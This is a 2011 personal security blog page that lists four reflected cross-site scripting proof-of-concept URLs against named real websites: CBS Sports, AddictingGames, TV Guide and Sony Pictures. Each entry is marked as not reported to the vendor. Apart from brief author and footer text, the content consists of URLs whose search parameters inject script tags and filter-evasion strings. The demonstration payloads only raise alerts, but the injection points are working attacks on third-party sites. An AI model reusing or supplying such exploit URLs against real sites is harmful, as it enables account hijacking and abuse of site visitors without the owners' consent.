This site is my sandbox. I post security vulnerabilities I discover, project updates, and the occasional rant. Comments are usually disabled, but if you need to contact me, I am sure you will find a way to.
20
Aug 11

CBS Sports

Date: Aug-20-2011
Vendor Notified: No
Proof of Concept:
http://www.cbssports.com/info/search#q=//";//\";//--></script>">'><script>alert(0)</script>

20
Aug 11

AddictingGames

Date: Aug-20-2011
Vendor Notified: No
Proof of Concept:
http://www.addictinggames.com/static/php/game/searchPage.php?pageAction=search&text=%3C/script%3E%3Cscript%3Ealert%280%29;%3C/script%3E

18
Aug 11

TV Guide

Date: Aug-18-2011
Vendor Notified: No
Proof of Concept:
http://www.tvguide.com/search/index.aspx?keyword=%22%3E%3Cscript%3Ealert%28%270%27%29;%3C/script%3E

18
Aug 11

Sony Pictures

Date: Aug-18-2011
Vendor Notified: No
Proof of Concept:
http://search.sonypictures.com/search?q=%22;alert%280%29//&proxystylesheet=sp-us&site=sp-us

Archives

Categories


Copyright © 2012 benburns.org
WordPress, sucka. Theme by Theme Lab